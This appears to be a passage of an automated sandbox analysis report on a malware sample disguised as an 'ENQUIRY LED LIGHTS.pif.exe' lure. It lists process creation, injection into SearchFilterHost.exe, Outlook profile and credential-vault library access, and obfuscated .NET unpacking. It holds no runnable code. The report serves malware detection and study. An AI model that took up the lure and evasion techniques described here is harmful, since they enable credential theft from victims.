            Source: unknownProcess created: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe "C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe"
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess created: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe "C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe"
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess created: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe "C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe"
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeProcess created: C:\Windows\SysWOW64\SearchFilterHost.exe "C:\Windows\SysWOW64\SearchFilterHost.exe"
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess created: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe "C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe"Jump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess created: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe "C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe"Jump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeProcess created: C:\Windows\SysWOW64\SearchFilterHost.exe "C:\Windows\SysWOW64\SearchFilterHost.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: iconcodecservice.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: tquery.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: cryptdll.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: ENQUIRY LED LIGHTS.pif.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: ENQUIRY LED LIGHTS.pif.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: bdtKgWWjtPR.exe, 00000007.00000000.1985350968.00000000001AE000.00000002.00000001.01000000.0000000C.sdmp, bdtKgWWjtPR.exe, 00000009.00000000.2288490724.00000000001AE000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: ENQUIRY LED LIGHTS.pif.exe, 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, SearchFilterHost.exe, 00000008.00000003.2075226084.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, SearchFilterHost.exe, 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmp, SearchFilterHost.exe, 00000008.00000003.2085919169.0000000004F90000.00000004.00000020.00020000.00000000.sdmp, SearchFilterHost.exe, 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: SearchFilterHost.pdbUGP source: bdtKgWWjtPR.exe, 00000007.00000002.2976848441.0000000001208000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: ENQUIRY LED LIGHTS.pif.exe, ENQUIRY LED LIGHTS.pif.exe, 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, SearchFilterHost.exe, SearchFilterHost.exe, 00000008.00000003.2075226084.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, SearchFilterHost.exe, 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmp, SearchFilterHost.exe, 00000008.00000003.2085919169.0000000004F90000.00000004.00000020.00020000.00000000.sdmp, SearchFilterHost.exe, 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: SearchFilterHost.pdb source: bdtKgWWjtPR.exe, 00000007.00000002.2976848441.0000000001208000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, P9I1LQRf00da55U6ir.cs.Net Code: Ul94V86DQW System.Reflection.Assembly.Load(byte[])
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.50e0000.5.raw.unpack, XlF5VlCIHRSQX8M5eh.cs.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.36f8e68.1.raw.unpack, XlF5VlCIHRSQX8M5eh.cs.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.3718e88.3.raw.unpack, XlF5VlCIHRSQX8M5eh.cs.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.9b80000.6.raw.unpack, P9I1LQRf00da55U6ir.cs.Net Code: Ul94V86DQW System.Reflection.Assembly.Load(byte[])
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4193c28.4.raw.unpack, P9I1LQRf00da55U6ir.cs.Net Code: Ul94V86DQW System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_00448B5B LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_00448B5B
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 0_2_00CEEFB0 push eax; iretd 0_2_00CEEFB1
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_0040C8BA push ds; retf 3_2_0040C8BE
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_0040D9D5 push ds; iretd 3_2_0040D9D6
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_0040219E push eax; ret 3_2_004021A1
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_00412A52 push cs; ret 3_2_00412A59
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_0041B342 push ecx; ret 3_2_0041B345
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_0041235F push ecx; retf 3_2_00412380
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_00414364 push ebx; retf 3_2_004143BC
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_00403C5C push eax; ret 3_2_00403C5E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_0040DC07 push dword ptr [eax]; iretd 3_2_0040DC12
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_004054D7 push esi; retf 3_2_004054EA
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_004054DF push esi; retf 3_2_004054EA
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_00416D61 push esi; ret 3_2_00416D62
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_00418516 push edi; iretd 3_2_0041852A
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_00416E82 push cs; retf 3_2_00416E8D
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_00401EB4 push ss; iretd 3_2_00401EB5
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_004057F8 push ds; iretd 3_2_004057F9
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_00447F95 push ecx; ret 3_2_00447FA8
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F109AD push ecx; mov dword ptr [esp], ecx3_2_02F109B6
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeCode function: 7_2_04149C12 push ds; iretd 7_2_04149C13
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeCode function: 7_2_041634BA push cs; retf 7_2_041634C6
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeCode function: 7_2_04150CD4 push ds; retf 7_2_04150CD8
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeCode function: 7_2_04151DEF push ds; iretd 7_2_04151DF0
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeCode function: 7_2_04156E6C push cs; ret 7_2_04156E73
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeCode function: 7_2_0415F75C push ecx; ret 7_2_0415F75F
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeCode function: 7_2_0415877E push ebx; retf 7_2_041587D6
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeCode function: 7_2_04156779 push ecx; retf 7_2_0415679A
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeCode function: 7_2_04152021 push dword ptr [eax]; iretd 7_2_0415202C
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeCode function: 7_2_041498F1 push esi; retf 7_2_04149904
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeCode function: 7_2_041498F9 push esi; retf 7_2_04149904
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeCode function: 7_2_0415C930 push edi; iretd 7_2_0415C944
            Source: ENQUIRY LED LIGHTS.pif.exeStatic PE information: section name: .text entropy: 7.630840846842573
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, nLR3bA80hJ4wspDwYO.csHigh entropy of concatenated method names: 'ffySd8hM0Y', 'HiOSgk6OuU', 'aS7SFRKc1d', 'wZFSOkMuqb', 'U68SxWTnEC', 'KwFS5Rojta', 'fFMuexB9TWqlJvu7Jo', 'st9qdyc4jMVkvrHf9X', 'lbeLZtMS3SAn02kyWU', 'WrJSSYKtVF'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, j2vSbIzuip2Doe0AA1.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LxQm7vXSZ6', 'DrTmx2LX6o', 'w0km5q8Vfx', 'TFmmWDHG68', 'LiAmRJqrNv', 'ygdmmQDebb', 'x3dmBBCnAu'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, fcVU1grtFVPAvdmFEO.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'mvNHp1HGsV', 'Xr4HqlmIeT', 'gXlHzqJNEV', 'AlqaT3R3jC', 'FTwaSVftyq', 'gbiaHMcZlI', 'spaaagIUDH', 'XswJhdlDx8iEv1BAnFG'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, g78YtbvSAnGYotjs65.csHigh entropy of concatenated method names: 'bq5oNFZL2R', 'gvmoMndr5M', 'O5eo0RhYWK', 'OoxoeHWZjs', 'R1aox7D7fu', 'J0Wo5u4Vdy', 'A4ioWNc7el', 'oPboRmSWdS', 'NQ0omvWIpd', 'lUXoBKnwPF'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, KIl1hf45qAvMav4dpU.csHigh entropy of concatenated method names: 'mEUxs0u7FT', 'uo3xjDjvI8', 'K3exhF0HYq', 'V8GxPoZf2k', 'dcJxXv9w3r', 'VOYxLevlP1', 'hVrxYTBv2v', 'YsixyKiofY', 'pFwx22sQa1', 'oGPxc0fGKg'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, tk9fVfH5iSssd1Iuq3.csHigh entropy of concatenated method names: 'Vt470ExZUO', 'uwf7e1CjJY', 'bGH7IAvE6e', 'xFY7XQ176P', 'gwA7YyP94N', 'JkQ7yFTWua', 'eKL7cYaC4T', 'BNb7iYoSVg', 'LRm7sOGUbZ', 'ufI7KXoBCH'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, MJqHXZggeHIDrjZqM8.csHigh entropy of concatenated method names: 'kdRdJpFpNP', 'ofwdDFRXhL', 'kVMdV5Tv9Z', 'K54dNNJZUR', 'eNwd6HXI4p', 'oFudMdQtok', 'SJld82xGE1', 'IwLd0DDlfc', 'tnodess885', 'vqGdCoHfpb'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, C6pYrh05IGfcUbyG3L.csHigh entropy of concatenated method names: 'pOZRIZkaV1', 'Dq0RXTTOTs', 'S42RL1BYLH', 'H0bRYbR3Ar', 'Q9fRhUofC0', 'FxuRyFcETj', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, awBbSNVR1ZSedZn6vX.csHigh entropy of concatenated method names: 'jSxmS0WHJH', 'RYVmaCviaC', 'xOVm41xh3A', 'fhPmvMDT2g', 'AfPmUErPWT', 'tFkmkwqdCk', 'Ubemr9qT3i', 'tK3Rb3QeG4', 'LPERfY0ZQl', 'FxiRpqtRCe'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, pGriIKtV0meYym5cfu.csHigh entropy of concatenated method names: 'mcXWfBOLOC', 'mwMWqmRUgV', 'QD2RTQOIpl', 'koxRSa7IVS', 'zPvWKD7iEd', 'PeRWjR3jmP', 'kf4WGpdZeJ', 'XZmWhKffgO', 'fMQWPLtd5y', 'RGEWlC3hyZ'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, zCdZB2IyVxidTBWpWC.csHigh entropy of concatenated method names: 'PAbUhdTVyo', 'poUUP5qYH7', 'tbnUlV8KDa', 'tcqUtiTeWH', 'mioUQpgilx', 'po5UESVjen', 'ekrUb2LgdE', 'IgVUfxDkoc', 'IsvUpnxKJy', 'w7ZUqXiTOk'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, P9I1LQRf00da55U6ir.csHigh entropy of concatenated method names: 'Fr3awjqXOM', 'llMavBwPKk', 'YdaaUjRbkw', 'LgMaoAhQM6', 'EahakSW4ES', 'wSSarM8maF', 'BWDadClimu', 'ymxagewSGP', 'rJqa3mcGqy', 'VnaaFkiivw'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, VoGKZkmcFQfRYiAx9v.csHigh entropy of concatenated method names: 's3PrwrEOZd', 'jbPrUj5TW7', 'EosrkHiGK0', 'CSBrdk4yN4', 'WFyrgdGgX4', 'b1SkQ4yo4S', 'i2YkEkiBkO', 'AhxkbtRrCf', 'SuokfDbyBa', 'pVkkpAJWLq'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, Fnk7iidicNbWyXGiQpt.csHigh entropy of concatenated method names: 'bRsmJ705d2', 'eg6mDDCufo', 'LqXmVXvFy7', 'F1ImNK6XuC', 'qqDm6bHG9x', 'LLCmMwwDNN', 'zV2m8WtiR1', 'L8im0FIkKk', 'LBxme6ZtsY', 'gktmCvH7Xb'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, ta0jagdddddL9UFCV5V.csHigh entropy of concatenated method names: 'ToString', 'M9dBa6SCtb', 'rSGB42C2dH', 'kaUBwaaKPy', 'LLrBvWNplo', 'APkBUcDALx', 'E07Bod73jP', 'zQWBkE2hVC', 'ym3DAdR8Q2RPZsy13ES', 'yrlG2ERwUT4tUlJYW6L'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, JjXEOud2tpryD05P0iy.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'hrgBhXOPkm', 'lccBPTOSMH', 'fUqBlywT2W', 'XpIBtj2Nlv', 'N53BQmkMXO', 'CJYBEETh23', 'jNIBbQA5vJ'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, gLSqvkwK26E24TpbqO.csHigh entropy of concatenated method names: 'dV6VxPgxH', 'lh3NP17mM', 'Xl0MADqPh', 'Rwk8ysWUJ', 'TFneD4lZY', 'T1AChpiKS', 'LkNOKp8edTC8VcJh2P', 'vpcuNJwSjCGnMPTppF', 'p4AR5qm1e', 'h6pBisSBS'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, jdZGL2oOZSYUKaCTD5.csHigh entropy of concatenated method names: 'i3dRvW9cvJ', 'fOGRUu7j5d', 'gijRoPtdgO', 'lelRkrPtHW', 'PDeRrZh7q0', 't17RdARKVx', 'mN7Rgha0sj', 'kpYR3qYs3n', 'OnaRFWKy0u', 'jZkROO4Im8'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, HYnt06Oc4HTad2fcJ8.csHigh entropy of concatenated method names: 'bcYdvV6nYa', 'XeGdofkAAY', 'RHXdr59f6E', 'zK2rq3BGGn', 'nparzakC6r', 'NkldTeUi6b', 'XgddSIBcqq', 'jNRdHYM2fs', 'K76dabiFdO', 'ESYd43laRo'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, sYronPkJY2qAxmeuZo.csHigh entropy of concatenated method names: 'Dispose', 'WeeSpdh2i7', 'SCKHXeUQ6g', 'fnc11rBEvq', 'JRmSqF4hhM', 'lFhSzOUyld', 'ProcessDialogKey', 'lpTHTOR9pN', 'ut8HSWsGG9', 'uXNHHIRYVf'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.9b80000.6.raw.unpack, nLR3bA80hJ4wspDwYO.csHigh entropy of concatenated method names: 'ffySd8hM0Y', 'HiOSgk6OuU', 'aS7SFRKc1d', 'wZFSOkMuqb', 'U68SxWTnEC', 'KwFS5Rojta', 'fFMuexB9TWqlJvu7Jo', 'st9qdyc4jMVkvrHf9X', 'lbeLZtMS3SAn02kyWU', 'WrJSSYKtVF'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.9b80000.6.raw.unpack, j2vSbIzuip2Doe0AA1.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LxQm7vXSZ6', 'DrTmx2LX6o', 'w0km5q8Vfx', 'TFmmWDHG68', 'LiAmRJqrNv', 'ygdmmQDebb', 'x3dmBBCnAu'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.9b80000.6.raw.unpack, fcVU1grtFVPAvdmFEO.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'mvNHp1HGsV', 'Xr4HqlmIeT', 'gXlHzqJNEV', 'AlqaT3R3jC', 'FTwaSVftyq', 'gbiaHMcZlI', 'spaaagIUDH', 'XswJhdlDx8iEv1BAnFG'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.9b80000.6.raw.unpack, g78YtbvSAnGYotjs65.csHigh entropy of concatenated method names: 'bq5oNFZL2R', 'gvmoMndr5M', 'O5eo0RhYWK', 'OoxoeHWZjs', 'R1aox7D7fu', 'J0Wo5u4Vdy', 'A4ioWNc7el', 'oPboRmSWdS', 'NQ0omvWIpd', 'lUXoBKnwPF'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.9b80000.6.raw.unpack, KIl1hf45qAvMav4dpU.csHigh entropy of concatenated method names: 'mEUxs0u7FT', 'uo3xjDjvI8', 'K3exhF0HYq', 'V8GxPoZf2k', 'dcJxXv9w3r', 'VOYxLevlP1', 'hVrxYTBv2v', 'YsixyKiofY', 'pFwx22sQa1', 'oGPxc0fGKg'
